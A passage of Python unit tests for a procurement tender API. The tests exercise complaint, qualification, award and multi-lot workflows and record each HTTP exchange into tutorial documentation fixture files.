        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id), {"data": {
        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')

    # Reviewer uploads a resolution document and settles the accepted complaints.
    with open('docs/source/tutorial/complaint-resolution-upload.http', 'w') as self.app.file_obj:
        response = self.app.post('/tenders/{}/complaints/{}/documents'.format(self.tender_id, complaint1_id),
                                 upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
    with open('docs/source/tutorial/complaint-resolve.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id), {"data": {
            "status": "satisfied"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/complaint-decline.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id), {"data": {
            "status": "declined"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/complaint-accepted-stopped.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id), {"data": {
            "decision": "Тендер скасовується замовником",
            "status": "stopped"
        }})
        self.assertEqual(response.status, '200 OK')

    # Back to the broker: the owner reports the satisfied complaint resolved.
    self.app.authorization = ('Basic', ('broker', ''))
    with open('docs/source/tutorial/complaint-resolved.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, owner_token), {"data": {
            "tendererAction": "Умови виправлено",
            "status": "resolved"
        }})
        self.assertEqual(response.status, '200 OK')
    # Complainant #6 asks to stop the accepted complaint...
    with open('docs/source/tutorial/complaint-accepted-stopping.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint6_id, complaint6_token), {"data": {
            "cancellationReason": "Тендер скасовується замовником",
            "status": "stopping"
        }})
        self.assertEqual(response.status, '200 OK')
    # ...and the reviewer stops it.
    self.app.authorization = ('Basic', ('reviewer', ''))
    with open('docs/source/tutorial/complaint-stopping-stopped.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id), {"data": {
            "decision": "Тендер скасовується замовником",
            "status": "stopped"
        }})
        self.assertEqual(response.status, '200 OK')

    # Complaint #7: created only to demonstrate cancellation by its author.
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), complaint)
    self.assertEqual(response.status, '201 Created')
    complaint7_id = response.json['data']['id']
    complaint7_token = response.json['access']['token']
    with open('docs/source/tutorial/complaint-cancel.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint7_id, complaint7_token), {"data": {
            "cancellationReason": "Умови виправлено",
            "status": "cancelled"
        }})
        self.assertEqual(response.status, '200 OK')

    # Anonymous listing / retrieval fixtures.
    with open('docs/source/tutorial/complaints-list.http', 'w') as self.app.file_obj:
        self.app.authorization = None
        response = self.app.get('/tenders/{}/complaints'.format(self.tender_id))
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/complaint.http', 'w') as self.app.file_obj:
        self.app.authorization = None
        response = self.app.get('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id))
        self.assertEqual(response.status, '200 OK')
def test_qualification_complaints(self):
    """Set up a tender in the ``active.pre-qualification.stand-still`` state.

    Creates a tender, registers two bids, runs pre-qualification
    (activating every qualification as the tender owner) and moves the
    tender into the stand-still period.  The qualification-complaint
    tutorial fixture generation that would follow is entirely commented
    out below.
    """
    response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
    self.assertEqual(response.status, '201 Created')
    tender = response.json['data']
    owner_token = response.json['access']['token']
    self.tender_id = tender['id']
    # First bid: created and switched to "pending" by its owner.
    response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid)
    bid_id = response.json['data']['id']
    bid_token = response.json['access']['token']
    response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
        self.tender_id, bid_id, bid_token), {"data": {"status": "pending"}})
    # create second bid
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid2)
    # Pre-qualification
    self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
    auth = self.app.authorization
    self.app.authorization = ('Basic', ('chronograph', ''))
    # Identity patch under the "chronograph" role nudges the tender into the
    # pre-qualification status (the payload carries no actual change).
    response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
    self.app.authorization = auth
    response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
    self.assertEqual(response.status, "200 OK")
    qualifications = response.json['data']
    # Tender owner approves every qualification.
    for qualification in qualifications:
        response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualification['id'], owner_token),
                                       {"data": {"status": "active"}})
        self.assertEqual(response.status, "200 OK")
    # active.pre-qualification.stand-still
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
                                   {"data": {"status": "active.pre-qualification.stand-still"}})
    self.assertEqual(response.status, "200 OK")
    self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
    qualification_id = qualifications[0]['id']
    # NOTE(review): the entire qualification-complaint fixture flow below is
    # commented out -- presumably because qualification complaints are not
    # documented/implemented for this procedure yet; confirm before
    # re-enabling.
    #with open('docs/source/tutorial/qualification-complaint-submission.http', 'w') as self.app.file_obj:
    # response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
    # self.assertEqual(response.status, '201 Created')
    #complaint1_token = response.json['access']['token']
    #complaint1_id = response.json['data']['id']
    #with open('docs/source/tutorial/qualification-complaint-submission-upload.http', 'w') as self.app.file_obj:
    # response = self.app.post('/tenders/{}/qualifications/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, complaint1_token),
    # upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
    # self.assertEqual(response.status, '201 Created')
    #with open('docs/source/tutorial/qualification-complaint-complaint.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
    # self.assertEqual(response.status, '200 OK')
    #complaint_data = {'data': complaint['data'].copy()}
    #complaint_data['data']['status'] = 'pending'
    #with open('docs/source/tutorial/qualification-complaint-submission-complaint.http', 'w') as self.app.file_obj:
    # response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
    # self.assertEqual(response.status, '201 Created')
    #complaint2_token = response.json['access']['token']
    #complaint2_id = response.json['data']['id']
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
    #self.assertEqual(response.status, '201 Created')
    #complaint3_token = response.json['access']['token']
    #complaint3_id = response.json['data']['id']
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
    #self.assertEqual(response.status, '201 Created')
    #complaint4_token = response.json['access']['token']
    #complaint4_id = response.json['data']['id']
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint_data)
    #self.assertEqual(response.status, '201 Created')
    #complaint5_token = response.json['access']['token']
    #complaint5_id = response.json['data']['id']
    #claim = {'data': complaint['data'].copy()}
    #claim['data']['status'] = 'claim'
    #with open('docs/source/tutorial/qualification-complaint-submission-claim.http', 'w') as self.app.file_obj:
    # response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), claim)
    # self.assertEqual(response.status, '201 Created')
    #complaint6_token = response.json['access']['token']
    #complaint6_id = response.json['data']['id']
    #with open('docs/source/tutorial/qualification-complaint-answer.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint6_id, owner_token), {"data": {
    # "status": "answered",
    # "resolutionType": "resolved",
    # "resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-satisfy.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint6_id, complaint6_token), {"data": {
    # "satisfied": True,
    # }})
    # self.assertEqual(response.status, '200 OK')
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), claim)
    #self.assertEqual(response.status, '201 Created')
    #complaint7_token = response.json['access']['token']
    #complaint7_id = response.json['data']['id']
    #response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint7_id, owner_token), {"data": {
    # "status": "answered",
    # "resolutionType": "invalid",
    # "resolution": "Вимога не відповідає предмету закупівлі"
    #}})
    #self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-unsatisfy.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint7_id, complaint7_token), {"data": {
    # "satisfied": False,
    # }})
    # self.assertEqual(response.status, '200 OK')
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
    #self.assertEqual(response.status, '201 Created')
    #with open('docs/source/tutorial/qualification-complaint-claim.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, response.json['data']['id'], response.json['access']['token']), {"data": {
    # "status": "claim"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #response = self.app.post_json('/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(self.tender_id, qualification_id, bid_token), complaint)
    #self.assertEqual(response.status, '201 Created')
    #with open('docs/source/tutorial/qualification-complaint-cancel.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, response.json['data']['id'], response.json['access']['token']), {"data": {
    # "cancellationReason": "Умови виправлено",
    # "status": "cancelled"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #self.app.authorization = ('Basic', ('reviewer', ''))
    #with open('docs/source/tutorial/qualification-complaint-reject.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint2_id), {"data": {
    # "status": "invalid"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-accept.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id), {"data": {
    # "status": "accepted"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint3_id), {"data": {
    # "status": "accepted"
    #}})
    #self.assertEqual(response.status, '200 OK')
    #response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint4_id), {"data": {
    # "status": "accepted"
    #}})
    #self.assertEqual(response.status, '200 OK')
    #response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint5_id), {"data": {
    # "status": "accepted"
    #}})
    #self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-resolution-upload.http', 'w') as self.app.file_obj:
    # response = self.app.post('/tenders/{}/qualifications/{}/complaints/{}/documents'.format(self.tender_id, qualification_id, complaint1_id),
    # upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
    # self.assertEqual(response.status, '201 Created')
    #with open('docs/source/tutorial/qualification-complaint-resolve.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id), {"data": {
    # "status": "satisfied"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-decline.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint3_id), {"data": {
    # "status": "declined"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint5_id), {"data": {
    # "decision": "Тендер скасовується замовником",
    # "status": "stopped"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #self.app.authorization = ('Basic', ('broker', ''))
    #with open('docs/source/tutorial/qualification-complaint-resolved.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint1_id, owner_token), {"data": {
    # "tendererAction": "Умови виправлено",
    # "status": "resolved"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #with open('docs/source/tutorial/qualification-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(self.tender_id, qualification_id, complaint4_id, complaint4_token), {"data": {
    # "cancellationReason": "Тендер скасовується замовником",
    # "status": "stopping"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #self.app.authorization = ('Basic', ('reviewer', ''))
    #with open('docs/source/tutorial/qualification-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
    # response = self.app.patch_json('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint4_id), {"data": {
    # "decision": "Тендер скасовується замовником",
    # "status": "stopped"
    # }})
    # self.assertEqual(response.status, '200 OK')
    #self.app.authorization = None
#with open('docs/source/tutorial/qualification-complaints-list.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/qualifications/{}/complaints'.format(self.tender_id, qualification_id))
# self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/qualification-complaint.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/qualifications/{}/complaints/{}'.format(self.tender_id, qualification_id, complaint1_id))
# self.assertEqual(response.status, '200 OK')
@unittest.skip("complaints not implemeted")
def test_award_complaints(self):
    """Drive the full award-complaint lifecycle, capturing each HTTP
    exchange into ``docs/source/tutorial/*.http`` fixture files used by
    the documentation build.

    Skipped: complaints are not implemented for this procedure yet.
    """
    # --- setup: tender with two bids, pre-qualification, pending award ---
    response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
    self.assertEqual(response.status, '201 Created')
    tender = response.json['data']
    owner_token = response.json['access']['token']
    self.tender_id = tender['id']
    response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid)
    bid_id = response.json['data']['id']
    bid_token = response.json['access']['token']
    response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
        self.tender_id, bid_id, bid_token), {"data": {"status": "pending"}})
    # create second bid
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.post_json('/tenders/{}/bids'.format(self.tender_id), bid2)
    # Pre-qualification
    self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
    auth = self.app.authorization
    self.app.authorization = ('Basic', ('chronograph', ''))
    # chronograph "tick": a no-op patch that triggers the status switch
    response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
    self.app.authorization = auth
    response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
    self.assertEqual(response.status, "200 OK")
    qualifications = response.json['data']
    for qualification in qualifications:
        response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualification['id'], owner_token),
                                       {"data": {"status": "active"}})
        self.assertEqual(response.status, "200 OK")
    # active.pre-qualification.stand-still
    response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
                                   {"data": {"status": "active.pre-qualification.stand-still"}})
    self.assertEqual(response.status, "200 OK")
    self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
    # switch to active.auction
    self.set_status('active.auction')
    self.app.authorization = ('Basic', ('auction', ''))
    response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
    auction_bids_data = response.json['data']['bids']
    self.app.post_json('/tenders/{}/auction'.format(self.tender_id), {'data': {'bids': auction_bids_data}})
    self.app.authorization = ('Basic', ('broker', ''))
    response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
    # get pending award
    award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
    self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
    # NOTE(review): the patch above is not assigned to ``response``, so this
    # assertion re-checks the earlier GET, not the patch — confirm intent.
    self.assertEqual(response.status, '200 OK')
    # --- complaint fixtures: submission, document upload, escalation ---
    with open('docs/source/tutorial/award-complaint-submission.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
        self.assertEqual(response.status, '201 Created')
    complaint1_token = response.json['access']['token']
    complaint1_id = response.json['data']['id']
    with open('docs/source/tutorial/award-complaint-submission-upload.http', 'w') as self.app.file_obj:
        response = self.app.post('/tenders/{}/awards/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, award_id, complaint1_id, complaint1_token),
                                 upload_files=[('file', u'Complaint_Attachement.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
    with open('docs/source/tutorial/award-complaint-complaint.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint1_id, complaint1_token), {"data": {"status": "pending"}})
        self.assertEqual(response.status, '200 OK')
    complaint_data = {'data': complaint['data'].copy()}
    complaint_data['data']['status'] = 'pending'
    with open('docs/source/tutorial/award-complaint-submission-complaint.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
        self.assertEqual(response.status, '201 Created')
    complaint2_token = response.json['access']['token']
    complaint2_id = response.json['data']['id']
    # complaints 3-5 are created without capturing fixtures
    response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
    self.assertEqual(response.status, '201 Created')
    complaint3_token = response.json['access']['token']
    complaint3_id = response.json['data']['id']
    response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
    self.assertEqual(response.status, '201 Created')
    complaint4_token = response.json['access']['token']
    complaint4_id = response.json['data']['id']
    response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint_data)
    self.assertEqual(response.status, '201 Created')
    complaint5_token = response.json['access']['token']
    complaint5_id = response.json['data']['id']
    # --- claim flow: answered / satisfied / unsatisfied ---
    claim = {'data': complaint['data'].copy()}
    claim['data']['status'] = 'claim'
    with open('docs/source/tutorial/award-complaint-submission-claim.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), claim)
        self.assertEqual(response.status, '201 Created')
    complaint6_token = response.json['access']['token']
    complaint6_id = response.json['data']['id']
    with open('docs/source/tutorial/award-complaint-answer.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint6_id, owner_token), {"data": {
            "status": "answered",
            "resolutionType": "resolved",
            "resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-satisfy.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint6_id, complaint6_token), {"data": {
            "satisfied": True,
        }})
        self.assertEqual(response.status, '200 OK')
    response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), claim)
    self.assertEqual(response.status, '201 Created')
    complaint7_token = response.json['access']['token']
    complaint7_id = response.json['data']['id']
    response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint7_id, owner_token), {"data": {
        "status": "answered",
        "resolutionType": "invalid",
        "resolution": "Вимога не відповідає предмету закупівлі"
    }})
    self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-unsatisfy.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint7_id, complaint7_token), {"data": {
            "satisfied": False,
        }})
        self.assertEqual(response.status, '200 OK')
    response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
    self.assertEqual(response.status, '201 Created')
    with open('docs/source/tutorial/award-complaint-claim.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, response.json['data']['id'], response.json['access']['token']), {"data": {
            "status": "claim"
        }})
        self.assertEqual(response.status, '200 OK')
    # --- reviewer decisions on the collected complaints ---
    self.app.authorization = ('Basic', ('reviewer', ''))
    with open('docs/source/tutorial/award-complaint-reject.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint2_id), {"data": {
            "status": "invalid"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-accept.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id), {"data": {
            "status": "accepted"
        }})
        self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id), {"data": {
        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id), {"data": {
        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')
    response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id), {"data": {
        "status": "accepted"
    }})
    self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-resolution-upload.http', 'w') as self.app.file_obj:
        response = self.app.post('/tenders/{}/awards/{}/complaints/{}/documents'.format(self.tender_id, award_id, complaint1_id),
                                 upload_files=[('file', u'ComplaintResolution.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
    with open('docs/source/tutorial/award-complaint-resolve.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id), {"data": {
            "status": "satisfied"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-decline.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id), {"data": {
            "status": "declined"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id), {"data": {
            "decision": "Тендер скасовується замовником",
            "status": "stopped"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaints-list.http', 'w') as self.app.file_obj:
        self.app.authorization = None
        response = self.app.get('/tenders/{}/awards/{}/complaints'.format(self.tender_id, award_id))
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint.http', 'w') as self.app.file_obj:
        self.app.authorization = None
        response = self.app.get('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id))
        self.assertEqual(response.status, '200 OK')
    # --- resolution by the procuring entity; award is re-issued ---
    self.app.authorization = ('Basic', ('broker', ''))
    with open('docs/source/tutorial/award-complaint-satisfied-resolving.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {
            "status": "cancelled"
        }})
        self.assertEqual(response.status, '200 OK')
    new_award_id = response.headers['Location'][-32:]
    with open('docs/source/tutorial/award-complaint-resolved.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint1_id, owner_token), {"data": {
            "tendererAction": "Умови виправлено, вибір переможня буде розгянуто повторно",
            "status": "resolved"
        }})
        self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, complaint4_id, complaint4_token), {"data": {
            "cancellationReason": "Тендер скасовується замовником",
            "status": "stopping"
        }})
        self.assertEqual(response.status, '200 OK')
    self.app.authorization = ('Basic', ('reviewer', ''))
    with open('docs/source/tutorial/award-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint4_id), {"data": {
            "decision": "Тендер скасовується замовником",
            "status": "stopped"
        }})
        self.assertEqual(response.status, '200 OK')
    # --- repeat submission/cancel against the replacement award ---
    self.app.authorization = ('Basic', ('broker', ''))
    award_id = new_award_id
    self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
    # NOTE(review): unassigned patch again — the assertion below checks the
    # previous response object, not this patch. Verify intent.
    self.assertEqual(response.status, '200 OK')
    with open('docs/source/tutorial/award-complaint-submit.http', 'w') as self.app.file_obj:
        response = self.app.post_json('/tenders/{}/awards/{}/complaints?acc_token={}'.format(self.tender_id, award_id, bid_token), complaint)
        self.assertEqual(response.status, '201 Created')
    with open('docs/source/tutorial/award-complaint-cancel.http', 'w') as self.app.file_obj:
        response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, award_id, response.json['data']['id'], response.json['access']['token']), {"data": {
            "cancellationReason": "Умови виправлено",
            "status": "cancelled"
        }})
        self.assertEqual(response.status, '200 OK')
def test_multiple_lots(self):
request_path = '/tenders?opt_pretty=1'
#### Exploring basic rules
#
with open('docs/source/multiple_lots_tutorial/tender-listing.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.file_obj.write("\n")
#### Creating tender
#
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/multiple_lots_tutorial/tender-post-attempt-json-data.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
tender_id = self.tender_id = tender['id']
owner_token = response.json['access']['token']
# add lots
with open('docs/source/multiple_lots_tutorial/tender-add-lot.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': test_lots[0]})
self.assertEqual(response.status, '201 Created')
lot_id1 = response.json['data']['id']
response = self.app.post_json('/tenders/{}/lots?acc_token={}'.format(tender_id, owner_token), {'data': test_lots[1]})
self.assertEqual(response.status, '201 Created')
lot_id2 = response.json['data']['id']
# add relatedLot for item
with open('docs/source/multiple_lots_tutorial/tender-add-relatedLot-to-item.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), {"data": {"items": [{'relatedLot': lot_id1}, {'relatedLot': lot_id2}]}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/tender-listing-no-auth.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/tender-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/multiple_lots_tutorial/bid-lot1.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
{'data': {
'tenderers': bid['data']["tenderers"], 'lotValues': [{
"value": {"amount": 500}, 'relatedLot': lot_id1}]}})
self.assertEqual(response.status, '201 Created')
bid1_token = response.json['access']['token']
bid1_id = response.json['data']['id']
with open('docs/source/multiple_lots_tutorial/bid-lot2.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(tender_id),
